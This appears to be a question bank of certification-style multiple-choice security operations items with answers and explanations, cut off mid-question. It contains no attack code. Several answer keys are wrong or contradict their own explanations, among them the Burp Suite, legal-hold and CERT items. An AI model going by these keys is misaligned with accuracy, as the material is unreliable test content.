A. To add additional layers of security when traditional measures are not viable Compensating controls provide additional layers of security to protect against malicious or accidental breaches. Compensating controls should be for the organization's specific security needs and regularly reviewed and updated to ensure they remain effective.

A large organization tasked a cybersecurity analyst with improving the organization's understanding of potential attack methodologies. How would the analyst effectively comprehend and analyze different attack strategies employed by adversaries? A. Train on the cyber kill chain framework B. Conduct forensic analysis C. Attend security awareness training sessions D. Implement an intrusion prevention system (IPS)

A. Train on the cyber kill chain framework By training on the cyber kill chain framework, a cybersecurity analyst can gain a better understanding of the different attack methodologies and strategies employed by adversaries.

The Common Vulnerability Scoring System (CVSS) scoring for a newly deployed virtual appliance has reached 9.4. The attack vectors in the report included physical and network paths. Some of the other metrics in the report included: Privileges Required (PR) with a value of 'N' and User Interaction (UI) with a value of 'N.' After reviewing the details of the CVSS report, which response would a systems security officer provide to the appliance administrators to resolve most of the issues immediately? A. Use only Active Directory (AD) groups and/or configure roles B. Verify physical access logs to server racks C. Setup data-at-rest encryption for the SQL database D. Setup a new local account with a complex password

A. Use only Active Directory (AD) groups and/or configure roles The PR metric with 'N' or none suggests a guest or anonymous user has access and can exploit more vulnerabilities. Setting up roles or permissions can prevent full access and most of the vulnerabilities.

A security analyst is investigating a security incident that has affected several workstations in their organization. The analyst needs to gather evidence from the affected hosts to determine the extent of the compromise and identify the malicious actor's tactics. Which of the following should the analyst use to effectively explore host indicators related to this incident? A. Utilizing forensic analysis tools B. Developing an incident response plan C. Conducting tabletop exercises D. Performing root cause analysis

A. Utilizing forensic analysis tools Forensic analysis tools help the security analyst collect and analyze evidence from affected hosts, such as log files, memory dumps, and file system artifacts. These tools are essential for exploring host indicators and understanding the nature of the security incident.

A company wants to implement a method of integrating third-party applications with their system. They want to automate the process of receiving real-time updates from external systems without having to poll them. Which technology would best fit their needs? A. Webhooks B. APIs C. Plugins D. Single pane of glass

A. Webhooks Webhooks allow real-time data transfer between two systems by sending a notification to the receiving system when specific events occur in the sending system. Webhooks are useful to trigger automated actions such as an update.

Each time a specific event occurs, a security architect wants to update a database with standard information generated by the alert. What is an effective automated mechanism to accomplish this goal? A. Webhooks B. Plugins C. Data enrichment D. Team coordination

A. Webhooks Webhooks are automated messages sent from an app to a unique URL and include relevant information about the event and when the event occurred.

A small financial services firm has experienced a ransomware attack that has resulted in the loss of critical financial data. What information should be included in the incident report to ensure an effective incident response? (Select the three best options.) A. What types of data were affected? B. What was the order of the events for the attack? C. What was the date and time of the attack? D. Who was responsible for the attack?

A. What types of data were affected? B. What was the order of the events for the attack? C. What was the date and time of the attack? Effective incident reporting should include the "who, what, when, where, and why" of the incident. In the case of a ransomware attack that has resulted in the loss of critical financial data, including the types of data affected is especially important. This information will help assess the potential impact of the incident and develop appropriate remediation measures. It is especially important to include information about the attack's order of events in the incident report's timeline. Including information about the attack's date and time in the incident report's timeline is also important.

A security analyst is investigating a potential security breach in the company's network. The analyst is using Wireshark and tcpdump to analyze the network traffic and detect any suspicious activity. Which tool can be used to view the network packets in real time and analyze them using a graphical user interface, while the other tool captures network packets and displays them in a text-based format? A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. B. Wireshark and tcpdump are both command-line tools the analyst can use for network analysis. C. Wireshark and tcpdump are both graphical user interface tools the analyst can use for network analysis. D. Tcpdump is a graphical user interface tool, while Wireshark is a command-line tool.

A. Wireshark is a graphical user interface tool, while tcpdump is a command-line tool. The analyst can utilize Wireshark, a graphical user interface tool, to view network packets in real time and analyze them in a user-friendly way.

Which of the following show how system and network architecture concepts are related to security operations? (Select the three best options.) A. Zero trust B. Cloud access security broker (CASB) C. Secure access secure edge (SASE) D. Firewall rules alone

A. Zero trust B. Cloud access security broker (CASB) C. Secure access secure edge (SASE) System and network architecture concepts are vital in security operations. Zero trust emphasizes network segmentation and access control to limit access to sensitive resources, reducing the attack surface. CASB technology offers comprehensive protection for cloud-based resources by enabling visibility into cloud usage, enforcing access control policies, and providing advanced threat protection to mitigate risks associated with cloud-based services. SASE combines network security, access control, and wide area network (WAN) capabilities to secure networks and ensure authorized access to critical resources.

A financial institution has experienced a cyber attack that has resulted in the theft of customer information. Which of the following is the most critical consideration for the incident response team? A. Incident declaration B Stakeholders impacted C. Timeline of breach D. Evidence

B Stakeholders impacted Determining the stakeholders impacted is an important part of crisis management. It is the most critical consideration for the incident response team.

A security operations center (SOC) manager is working to define the playbooks for a new security orchestration, automation, and response (SOAR) and wants to check URLs against VirusTotal automatically. What is an efficient and cost-effective way to automate this function? A. Single pane of glass B. API C. Webhook D. Plugin

B. API An application programming interface (API) automates communications between two or more applications. An API defines the types and formats of calls the system can make and is often free to use.

A large corporation has asked a facility security officer to install a system or implement a procedure that will assist in the discovery of threats or compromises. Which of the following is a suitable control for this situation? A. Turnstiles B. Account reviews C. Bollards D. Chain link fence

B. Account reviews Account reviews are a detective control since they attempt to find whether some form of suspicious activity has occurred on an account. This type of detective control can discover malicious activity using a legitimate account.

While reviewing alerts, an analyst notices a new signature is generating a high volume of false positives. This appears to be the result of an error in the way the signature is written. This represents an issue with what attribute of threat intelligence? A. Relevancy B. Accuracy C. Timeliness D. Reconnaissance

B. Accuracy Accuracy describes the correctness of threat intelligence. Accurate information is free of errors and biases.

After performing an automated scan on the OWASP Zed Attack Proxy (ZAP) tool, where can a security analyst find detailed information about a vulnerability finding such as cross-site scripting and its associated risk level? A. Advisory tab B. Alerts tab C. Event log panel D. Spider tab

B. Alerts tab The alerts tab is available on the Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP) tool. Clicking on a specific finding in the alert list will provide the vulnerability's URL, risk, and description.

Where would a network administrator find cross-domain misconfiguration in the Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP) application after an automated scan of the local web server? A. Spider tab B. Alerts tab C. Dispatchers tab D. Intruder tab

B. Alerts tab The alerts tab will populate the results of some attacks performed on the list of URLs from the spider tab. Cross-Domain misconfiguration is one example of available alerts.

A cybersecurity professional for a large organization is identifying malicious activity through analysis. When responding to a potential security incident, which action should the professional prioritize to manage the situation effectively? A. Implement a legal hold on potentially relevant data B. Assess the impact of the incident on the organization C. Perform a vulnerability scan on all network devices D. Update firewall rules to block all incoming traffic

B. Assess the impact of the incident on the organization When responding to a potential security incident, it is crucial to assess the impact of the incident on the organization. This will help them understand the severity of the situation, prioritize their response efforts, and allocate resources effectively to manage the incident.

A security operations center (SOC) manager identifies a list of frequently performed tasks. What might the SOC manager consider doing with these tasks? A. Using active defense B. Automating them C. Threat hunting D. Collecting OSINT

B. Automating them Automating frequently performed tasks can improve effectiveness, reduce response times, and free up resources to perform more valuable work.

Which of the following vulnerabilities allows attackers to obtain or change data or functionality they are otherwise not authorized to obtain or change? A. Security misconfiguration B. Broken access control C. Software and data integrity failures D. Injection

B. Broken access control Broken access control is a common vulnerability in web applications that can allow attackers to access sensitive data or perform unauthorized actions that change data or functionality, such as manipulating a URL.

A company has a web application that allows users to submit comments on a blog post. The application accepts comments of up to 200 characters and stores them in a fixed-sized temporary memory space without sanitizing input. An attacker takes advantage of this vulnerability by submitting a comment much longer than 200 characters. The attacker's comment contains malicious code designed to overwrite adjacent memory and execute arbitrary commands on the server. What type of attack is this? A. Integer overflow B. Buffer overflow C. Persistent XSS D. SSRF

B. Buffer overflow A buffer overflow attack attempts to write more data to a program's buffer (temporary storage area in memory) than it can hold, so the program executes malicious code in adjacent memory spaces.

A hacker finds a vulnerability in a web server within a target organization. By sending specially crafted input to the HTTP service, the hacker exceeds the program's memory capacity and causes the web server to exercise arbitrary commands. What type of attack is this? A. Integer overflow B. Buffer overflow C. Persistent XSS D. Session management

B. Buffer overflow A buffer overflow attack attempts to write more data to a program's buffer (temporary storage area in memory) than it can hold, so the program executes malicious code in adjacent memory spaces.

A company experienced a cyberattack that disrupted its normal operations. The attack resulted in the loss of customer data and a halt in product and service delivery. What is this scenario an example of? A. Organizational governance B. Business process interruption C. Degraded functionality D. Shareholder accountability

B. Business process interruption Business process interruption describes a disruption in an organization's normal operations. In this example, a cyber attack caused business process interruption, resulting in lost revenue, increased costs, and missed opportunities.

Which of the following might help a company coordinate the response to a cyberterrorist attack? (Select the two best options.) A. MITRE ATT&CK B. CERT C. OSINT D. CSIRT

B. CERT D. CSIRT Computer security incident response team (CERT) is a group tasked with mitigating and minimizing the impact of malicious activity. They coordinate across multiple organizations to ensure an effective response to major incidents. Computer security incident response team (CSIRT) is a group of security professionals with a wide variety of specialties who respond to security incidents quickly and effectively.

A network administrator assesses multiple attack vectors revealed from a recent vulnerability scan of the system's cloud-based software. Which of these CVSS scores presents the greatest threat to Availability Impact? A. CVSS:7.9/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L B. CVSS:5.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H C. CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N D. CVSS:2.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

B. CVSS:5.6/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS:5.6 ... /A:H indicates a Common Vulnerability Scoring System (CVSS) score of 5.6 and an Availability Impact of High (:H). It has the highest CVSS score with a high impact on Availability resulting in the greatest overall impact to Availability of the options presented.

A web application security specialist is examining the output of a recent web vulnerability assessment. Their primary objective is determining which vulnerabilities pose the greatest risk to the organization while considering the different stages of a cyber kill chain. Which approach should the specialist prioritize to achieve this goal? A. Focus on patching all identified vulnerabilities immediately B. Categorize vulnerabilities based on their potential impact C. Deploy a web application firewall to block malicious traffic D. Implement strong access control measures

B. Categorize vulnerabilities based on their potential impact The specialist can prioritize the most critical vulnerabilities by categorizing vulnerabilities according to their potential impact on the cyber kill chain. This approach aligns with the Open Web Application Security Project (OWASP) Testing Guide's methodology, which focuses on identifying and mitigating the most severe risks.

An administrator logged onto the Amazon Web Services (AWS) account and found that multi-factor authentication (MFA) was unnecessary to gain access. After running a quick scan using the Prowler assessment tool, the administrator discovered why MFA was not running. What part of the report confirmed the administrator's suspicions? A. Check service name column B. Check status extended column C. Check severity column D. Check rules column

B. Check status extended column The status extended column provides more information on the security finding. In this case, the description may state, "MFA is not enabled for root account."

Which statement best explains the importance of cloud system and network architecture concepts in security operations as they relate to hybrid and on-premises systems? A. Cloud system and network architecture concepts are only useful for securing cloud-based systems. B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. C. Cloud system and network architecture concepts are important for securing on-premises systems, not hybrid systems. D. Cloud system and network architecture concepts are not important for securing hybrid or on-premises systems.

B. Cloud system and network architecture concepts are essential for securing both hybrid and on-premises systems. Knowledge of cloud system and network architecture concepts is essential for securing both hybrid and on-premises systems.

After an incident, the incident response team wants to ensure that the organization can learn from the incident and improve its overall incident response capabilities. Which of the following steps should the team take to do this? A. Describe the impact on customers and partners B. Conduct a lessons learned review C. Conduct a timeline analysis D. Notify customers

B. Conduct a lessons learned review Conducting a lessons-learned review can help the incident response team identify areas for improvement in incident response capabilities and develop measures to address them.

A software development company is looking to enhance its security practices by incorporating attack methodology frameworks into its vulnerability assessment process. The company's management wants to ensure its web applications are secure against known threats and attack techniques. Which of the following actions should the company prioritize to integrate these frameworks and improve its security posture? A. Purchase and deploy additional antivirus software B. Conduct regular penetration testing of web applications C. Increase the frequency of security awareness training D. Upgrade network infrastructure

B. Conduct regular penetration testing of web applications By conducting regular penetration testing and aligning testing methodologies with frameworks like MITRE ATT&CK and Open Web Application Security Project (OWASP) Testing Guide, the company can ensure its web applications are secure against known threats and attack techniques.

A healthcare organization has experienced a data breach that has compromised patient records. How should the organization establish an order of events for the breach? A. Discover evidence B. Create a timeline of breach C. Determine stakeholders impacted D. Declare an incident

B. Create a timeline of breach Creating a timeline is critical to understanding how the attack unfolded and identifying potential weaknesses in the organization's security posture. It establishes an order of events for the breach.

When performing reconnaissance on multiple websites, how would a security engineer organize information to keep all reconnaissance campaigns isolated from one another in recon-ng? A. Create backdoors B. Create workspaces C. Add domains D. Add payloads

B. Create workspaces Workspaces organize different reconnaissance campaigns in recon-ng. Therefore, the security engineer should create multiple campaigns and move from one to the other as needed.

The IT team at a company wants to implement additional security measures to prevent recent phishing attempts against their employees. The team will use Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to secure the email system. Which of the following statements is true regarding DMARC, SPF, and DKIM in the context of email security operations A. DMARC, SPF, and DKIM are all email security protocols that use encryption to protect emails from phishing attempts. B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. C. DMARC, SPF, and DKIM are all email security protocols that use machine learning to detect and block spam emails. D. DMARC, SPF, and DKIM are all email security protocols that use firewalls to prevent unauthorized access to emails.

B. DMARC, SPF, and DKIM are all email security protocols that use digital signatures to authenticate emails and prevent spoofing. Domain-based Message Authentication, Reporting, and Conformance (DMARC) validates the authenticity of the sender's domain, while Sender Policy Framework (SPF) verifies that the message comes from an authorized IP address. DomainKeys Identified Mail (DKIM) adds a digital signature to the email to verify its integrity. Together, they help prevent phishing attacks and ensure the safety and security of email communication.

A financial institution's security analyst must discover any active threats to the network. The analyst relies on the OSSTMM and OWASP Testing Guide to effectively monitor and analyze these threats. After receiving an alert regarding a potential spear-phishing attack, what should be the analyst's initial priority when evaluating the situation? A. Implementing security measures recommended by the OSSTMM B. Detecting threat markers and weaknesses C. Evaluating the organization's web applications for security vulnerabilities D. Assessing the company's security protocols and procedures.

B. Detecting threat markers and weaknesses By using the Open Source Security Testing Methodology Manual (OSSTMM) and the Open Web Application Security Project (OWASP) Testing Guide to assess an active threat like a spear-phishing attack, the analyst can determine the scope and potential impact of the threat to help guide response actions effectively.

A company is struggling to keep up with the latest cybersecurity threats. They have been victims of several data breaches in the past year, and some customers are starting to lose confidence. The company's CEO has asked the CISO to devise a plan to improve the company's cybersecurity posture. Which of the following is the most important factor in improving the company's cybersecurity posture at the CISO's level? A. Prioritizing threat actors by impact B. Developing a strong organizational governance framework C. Mitigating the vulnerabilities in order of the number of affected hosts by a potential breach D. Mitigating the vulnerabilities, which provides opportunities to replace primary controls with compensating controls first

B. Developing a strong organizational governance framework Organizational governance is the process of setting and enforcing rules that govern how an organization operates. Cybersecurity is essential as it helps ensure that systems are secure and employees are responsible. The chief information security officer (CISO) is responsible for selecting organizational governance frameworks.

A web application permits users to upload images for their profile pictures. However, the application does not properly sanitize the filenames, and an attacker uploads a file with a malicious filename. By manipulating the filename, the attacker can access files on the server without authorization to access. What type of vulnerability does this situation describe? A. CSRF B. Directory traversal C. Broken access control D. Injection

B. Directory traversal Directory traversal is a web application vulnerability where an attacker can access files outside of the intended directory by manipulating user input, such as a filename.

A company has used an old software version for years without updating it due to compatibility issues with the new version. The vendor no longer supports the software, and a network administrator discovered a vulnerability that an attacker could exploit from the internet to gain unauthorized access to the software. What kind of vulnerability best describes this situation? A. CSRF B. EOL C. Broken access control D. Injection

B. EOL End of life (EOL) occurs when a vendor or manufacturer no longer supports a software product or hardware device. EOL leaves a software product or hardware device open to known and unknown security vulnerabilities.

A large retail chain has recently experienced a significant data breach, and the IT security team is working to prevent future breaches. As the team analyzes network traffic, they discover that the attacker was able to gain access through a previously unknown and publicly accessible entry point. What should be the team's top priority? A. Passive discovery B. Edge discovery C. Parameterized queries D. Network discovery

B. Edge discovery Edge discovery seeks to define the "edge" of the network entirely, representing every device with internet connectivity. Therefore, anything accessible to the internet is part of the edge. Since a previously unknown publicly accessible device was the source of the compromise, edge discovery is the top priority.

After scanning a website with the Burp Suite scanning tool, the web administrators ask for the web URL paths associated with the specific findings. Where can a security analyst find these URL paths in the tool? A. Target section B. Extender section C. Dispatcher's section D. Profiles section

B. Extender section The extender section allows administrators to add third-party extenders that change the tool's behaviors when performing scans.

The chief information officer (CIO) has scheduled the quarterly vulnerability scan with a well-trusted vendor for Payment Card Industry Data Security Standard (PCI DSS). What particular scan provides a view of the company's internet-facing systems? A. Internal scanning B. External scanning C. Credentialed D. Non-credentialed

B. External scanning External scans focus on the view of devices and services from the "outside" of the network, broadly referring to the Internet, whereas internal scans focus on the view from the "inside."

A security analyst is scheduling a vulnerability scan on several company critical systems. Which of these performances does the analyst need to consider that could impact the scan? (Select the three best options.) A. Sensitivity levels B. False positives C. Scan speed D. System identification

B. False positives C. Scan speed D. System identification When performing vulnerability scans, the scanner can receive false positives. Therefore, it is important to identify and manage false positives to reduce the time spent researching and validating them and increase the accuracy of the scan results. The scan speed is important as it can affect the accuracy of the scan results. If the scan is too slow or fast, it may miss important vulnerabilities. Identifying the operating system of the target system is essential to ensure that the correct vulnerability scans get applied to the system.

A company has increased the security operation center (SOC) budget to reassess its cybersecurity framework. The current company's framework revolves around the National Institute of Standards and Technology (NIST) guidelines. Which other organization frameworks could the SOC use its budget to achieve a better security posture? A. OWASP B. ISO C. GDPR D. FISMA

B. ISO International Organization for Standardization (ISO) develops many standards and frameworks governing the use of computers, networks, and telecommunications. These documents are available to purchase, and the additional paywall benefits the company's security posture.

A cybersecurity analyst must implement measures to address identified vulnerabilities in their organization's systems for security operations. While the analyst can fully remediate some vulnerabilities, others may require alternative strategies. Which of the following actions would best suit situations where full remediation is not feasible? A. Conduct penetration testing on a regular basis to discover new vulnerabilities B. Implement compensating controls to reduce the risk associated with the vulnerabilities C. Encrypt all organizational data using the strongest available encryption algorithm D. Share the identified vulnerabilities with other organizations to gather their insights

B. Implement compensating controls to reduce the risk associated with the vulnerabilities When full remediation of a vulnerability is not feasible, implementing compensating controls can help reduce the associated risks and protect the organization's systems. These controls serve as alternative measures to manage the risk.

A video gaming company is preparing a security patch to fix a known non-critical vulnerability in their game. What is the best way to approach deploying this patch as an administrator? A. Implement immediately to prevent exploitation B. Implement during the maintenance window C. Test the patch D. Rollback the previous update that generated the vulnerability to patch

B. Implement during the maintenance window Maintenance windows enable preventative maintenance and consistent deployment of non-critical patches. All work planned during maintenance windows should comply with change management policies.

A manufacturing company has recently suffered a successful cyber attack, leading to data integrity concerns. The organization's leadership is determined to implement appropriate controls to mitigate the risk of future attacks. Which of the following controls would be most effective in validating data integrity and preventing a recurrence of similar attacks? A. Re-image all systems on a regular basis B. Implement file integrity monitoring C. Deploy a network intrusion detection system D. Create an incident response team

B. Implement file integrity monitoring File integrity monitoring continuously checks and validates data integrity by detecting unauthorized changes to critical files. This helps protect the organization from similar attacks by identifying and responding to potential threats in real time.

A software development company is concerned about the security of its applications and wants to ensure the proper preservation of data and log analysis. The company needs advice on enhancing its security practices while considering the programming languages used in its applications. Which of the following actions would be most appropriate for the company to take to address their concerns? A. Adopt a standardized logging framework for consistent log generation B. Implement secure coding practices in the programming languages the company uses C. Conduct regular code reviews with a focus on security D. Implement proper input validation and output encoding

B. Implement secure coding practices in the programming languages the company uses By implementing secure coding practices in the programming languages, the company can minimize vulnerabilities and improve data preservation and log analysis to directly address their concerns.

A large organization has recently experienced a significant cyberattack that disrupted its daily operations. The organization's management team reviews the incident and improves its business continuity and disaster recovery strategies. They want to focus on patch management concepts as part of the lessons learned. Which patch management best practices would most effectively enhance their BC/DR preparedness? A. Establishing a centralized patch management system B. Implementing a risk-based patch prioritization C. Prioritizing updates based on vendor recommendations D. Coordinating patch management with change management processes

B. Implementing a risk-based patch prioritization A risk-based approach to patch prioritization helps ensure that the organization addresses the most critical vulnerabilities first, reducing the overall risk and improving the organization's resilience to cyberattacks or other disasters.

A large organization suffered a major data breach and tasked the cybersecurity team with conducting a forensic analysis to understand the extent of the damage and identify potential vulnerabilities. The team must learn from this incident and apply this knowledge to their system and network architecture. Which of the following steps is most crucial in effectively applying the lessons learned to improve the organization's security posture? A. Collecting and preserving digital evidence B. Implementing architectural changes based on findings C. Conducting regular network traffic analysis D. Performing vulnerability assessments on key systems

B. Implementing architectural changes based on findings The organization can address the identified vulnerabilities and improve its overall security posture by applying the lessons learned from the forensic analysis to make architectural changes in the system and network infrastructure.

A company's cybersecurity team wants to improve their threat intelligence capabilities. The team is responsible for protecting the organization's sensitive information from cyber threats. Which of the following strategies can improve the effectiveness of the cybersecurity team? A. Utilizing data enrichment techniques B. Improving team coordination and communication C. Conducting regular vulnerability assessments D. Utilizing threat feed combination techniques

B. Improving team coordination and communication Effective team coordination and communication are crucial for a successful cybersecurity program because it allows team members to share information and knowledge and enables a better response to cyber threats by ensuring clear understanding of roles and responsibilities.

Which of the following is an example of a key performance indicator (KPI) that can indicate a trend in an organization's cybersecurity incidents over time? A. Detection time B. Indicators of compromise (IoCs) C. Resource allocation D. Risk assessment

B. Indicators of compromise (IoCs) By tracking these key performance indicators (KPIs) over time, organizations can determine if the indicators of compromise (IoCs) are increasing in their environment, indicating a trend in cybersecurity incidents.

An organization is committed to continuous improvement in its incident response process. A recent cyber attack resulted in a legal hold on certain systems, and now the organization must decide on the best approach to handle this situation. Which of the following actions would be most appropriate for the organization in the context of continuous improvement? A. Wait for the organization to lift the legal hold before taking action B. Isolate and preserve the data on affected systems while deploying backup systems for operational continuity C. Perform a network-wide vulnerability scan D. Perform a risk assessment for the entire organization

B. Isolate and preserve the data on affected systems while deploying backup systems for operational continuity Re-imaging the affected systems helps restore normal operations quickly while preserving evidence for the legal hold. It aligns with the continuous improvement goal of minimizing downtime and responding effectively to incidents.

An analyst is reviewing logs and notices unusual traffic spikes and activity on unexpected ports. Further investigation reveals that the traffic originates from a group of servers on the network. What is the best course of action for the analyst to take in response? A. Ignore the unusual activity as it may be a false positive or a normal activity B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures C. Shutdown the affected servers and restore them from the most recent backup D. Deploy additional network monitoring tools to investigate the source of the traffic

B. Isolate the affected servers from the network to prevent further malicious activity and initiate incident response procedures To prevent the further spread of the attack and minimize the impact of the incident, the analyst should disconnect the affected servers from the network and initiate incident response procedures.

The cybersecurity team at a large organization is conducting a forensic analysis after a security breach. As part of the investigation, they need to examine the identity and access management (IAM) system to identify any unauthorized access or compromised accounts. What can the team use to most effectively achieve this goal during forensic analysis? A. Network traffic analyzers B. Log analysis tools C. Digital forensics imaging tools D. Endpoint protection software

B. Log analysis tools Log analysis tools can help the cybersecurity team analyze IAM logs, detect unauthorized access attempts or compromised accounts, and provide insights into any vulnerabilities or policy violations in the IAM system.

An organization has experienced a data breach. The organization hires a digital forensics investigator to identify the source of the breach, determine its impact, and provide guidance on improving its security. Which of the following actions is most crucial for the investigator during this process? A. Upgrade the organization's firewalls and intrusion prevention systems B. Maintain thorough documentation of digital evidence handling C. Implement multi-factor authentication for remote access D. Organize a security awareness training program for employees

B. Maintain thorough documentation of digital evidence handling Proper documentation is critical for upholding the integrity and admissibility of digital evidence. This approach aligns with the investigator's role in tracing the breach source and evaluating its consequences while ensuring a transparent investigation process.

The security team at a large organization is reviewing its incident response activities after a recent cyberattack. They want to understand the different stages of the attack, identify gaps in their defenses, and develop an effective response strategy for future incidents. What should the team focus on to comprehensively analyze the incident response activities? A. Deploy additional antivirus software B. Map incident response activities to attack stages C. Restrict access to sensitive data D. Upgrade network infrastructure

B. Map incident response activities to attack stages By mapping incident response activities to the stages of the cyber kill chain and MITRE ATT&CK framework, the security team can identify gaps in their defenses and response strategies. This approach allows the team to better understand the effectiveness of their incident response capabilities and make informed decisions for improvement.

A company considers entering into a collaboration with a potential partner. The potential partner is a large, well-respected company with a strong track record in cybersecurity. The company has a concern about the potential partner's ability to comprehend and meet all its needs per its standard operating procedures. What should the company implement to ensure mutual comprehension and communication methods short of legal recourse? A. Service-level agreement (SLA) B. Memorandum of understanding (MoU) C. Organizational governance D. Configuration management

B. Memorandum of understanding (MoU) A memorandum of understanding (MoU) outlines the terms and conditions of an agreement between two or more parties but is not legally binding. The company does not need legal recourse in this case, making an MoU suitable.

What is one of the primary goals of a security operations center (SOC) manager when implementing a security orchestration, automation, and response (SOAR) solution? A. Create webhooks B. Minimize human engagement C. Generate a cousin domain D. Conduct risk management

B. Minimize human engagement Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to specific SIEM-generated alerts. When something triggers an alert, the system can analyze it by following a defined set of instructions, minimizing human engagement.

A web administrator reviews a scan report of a web server that suggests a site allows for directory listings remotely and that the organization should upgrade the server to version 2.5.3 or higher. The report also shares a few other PHP errors. Which of the following tools would provide this information via the command line only? A. Arachni B. Nikto C. Zed Attack Proxy (ZAP) D. Burp Suite

B. Nikto Nikto is a web application scanner that uses the command line interface. It discovers the type of HTTP server and web applications running on a host.

Using the Zenmap Graphical User Interface (GUI), the security administrator can quickly scan a network and map its topology in concentric rings where each ring represents a hop from the central node. Which tool is the security administrator using in this case? A. Recon-ng B. Nmap C. Immunity debugger D. GNU debugger

B. Nmap The Zenmap GUI is available on the Nmap tool. It provides color highlighting and visual features to map out the network in a simple topology layout with concentric rings.

A company is concerned about the security of its web applications and wants to perform a comprehensive security assessment. They want to ensure their applications are free from common web vulnerabilities, such as SQL injection, cross-site scripting (XSS), and CSRF. Which of the following testing methodologies should the company use? A. MITRE ATT&CK B. OWASP Testing Guide C. Open Source Security Testing Methodology Manual D. Cyber kill chain

B. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide is a comprehensive guide to testing web applications for vulnerabilities. It includes detailed testing methodologies for common web vulnerabilities such as structured query language (SQL) injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).

A security analyst is investigating a recent cyberattack on their organization's web applications. The investigation must assess the web application vulnerabilities while considering special considerations in vulnerability scanning. Which framework should the analyst utilize to achieve this objective? A. MITRE ATT&CK Framework B. OWASP Testing Guide C. Cyber kill chain D. NIST Cybersecurity Framework

B. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide provides a comprehensive methodology for assessing web application vulnerabilities, considering any special aspects of vulnerability scanning for web applications.

A security analyst needs to identify vulnerabilities in the organization's network infrastructure. They need to understand the stages of an attack and use a comprehensive testing methodology that considers the context of vulnerabilities. Which of the following should the analyst use to effectively achieve these goals? A. Cyber kill chain B. Open Source Security Testing Methodology Manual (OSSTMM) C. Open Web Application Security Project (OWASP) Testing Guide D. Diamond Model of Intrusion Analysis

B. Open Source Security Testing Methodology Manual (OSSTMM) The OSSTMM is a comprehensive security testing methodology that considers vulnerability context considerations. It provides a systematic approach to identifying and assessing vulnerabilities in various systems, including network infrastructure.

An information security project manager of a large corporation suggests the security operations center (SOC) should replace the current vulnerability scanner with a more cost-efficient alternative that still retains the capabilities of their current closed-source software (proprietary software). At the next board meeting, which vulnerability scanner should the project manager propose? (Select the two best options.) A. Qualys B. OpenVAS C. OpenSCAP D. Nessus

B. OpenVAS C. OpenSCAP The OpenVAS scanner (openvas.org) is open-source software initially developed from the Nessus codebase before Nessus became commercial software. The cost efficiency of the open-source scanner, while maintaining the ability to assess CVSS scoring abilities, makes OpenVAS optimal for this scenario. OpenSCAP is an open-source scanner used to identify system vulnerabilities. It also provides the ability to calculate a Common Vulnerability Scoring System (CVSS) score based on the vulnerabilities identified in the system.

Which security control category do people primarily implement? A. Technical B. Operational C. Preventative D. Managerial

B. Operational People primarily implement operational controls (a control category) rather than systems. For example, security guards and training programs are operational controls rather than technical controls.

A security operations center (SOC) analyst is preparing a meeting with an upset client. The client protests that the vulnerability scans did not implement according to their change management procedures, causing a severe interruption in their critical systems' performances. During the meeting, what process should the analyst focus on to ensure the service level objectives (SLOs) meet expectations? A. Scheduling B. Operations C. Compliance D. CIS benchmarks

B. Operations Operations focus more on change management procedures to ensure all impacted parties know about scanning activity.

A company's security team recently discovered an unknown device connected to their network, and they suspect it could be a rogue device. The team wants to conduct scans and sweeps to locate and remove any unauthorized devices on the network. Which of the following are common types of scans or sweeps the team can use to locate rogue devices in the network? (Select the two best options.) A. Port scanning B. Passive scanning C. Active scanning D. Network mapping

B. Passive scanning C. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.

A financial organization is improving its security posture to meet regulatory compliance requirements. One of the critical aspects they need to address is the validation of data integrity in the context of the indicator of compromise (IoC). Which of the following methods would be most effective for the organization to achieve this goal? A. Encrypt data B. Perform frequent vulnerability scans C. Use multi-factor authentication D. Install antivirus software

B. Perform frequent vulnerability scans Regular vulnerability scans identify security weaknesses and potential IoCs within an organization's network and systems, which helps validate data integrity and maintain compliance with healthcare regulations.

An organization recently faced a cyber incident that caused a disruption in their operations. The cybersecurity team wants to strengthen their resilience strategies and address potential threats before they cause significant harm. To identify the root cause of the recent incident and improve their operational preparedness, which of the following approaches would be most effective? A. Examining past logs B. Performing a hypothesis-driven investigation C. Monitoring the network in real time D. Testing critical systems for vulnerabilities

B. Performing a hypothesis-driven investigation A hypothesis-driven investigation involves proactively searching for potential threats based on specific assumptions. This allows the team to focus on possible causes and identify previously unknown issues, improving the organization's operational preparedness.

A security analyst must evaluate the security of a web application. Which tools or methods would be most useful in identifying potential vulnerabilities in the application's code? A. Performing a penetration test on the web application B. Performing static application security testing C. Conducting manual code review D. Conducting tabletop exercises

B. Performing static application security testing Static application security testing (SAST) analyzes the source code or compiled versions of an application to identify potential security vulnerabilities, making it the most appropriate tool for this scenario.

A security analyst performing security operations on a company's network needs to use PowerShell and shell scripts to automate tasks and streamline processes. Which of the following correctly defines PowerShell and shell script in the context of security operations? A. PowerShell is a set of commands written in a specific language that runs on a Unix-based operating system, while a shell script is a command-line interface that allows you to manage and automate Windows-based operating systems. B. PowerShell is a command-line interface that allows the user to manage and automate Windows-based operating systems, while a shell script is a set of commands written in a specific language that runs on a Unix-based operating system. C. PowerShell and shell script are two different names for the same thing - a command-line interface that allows you to manage and automate operating systems. D. PowerShell and shell script ar

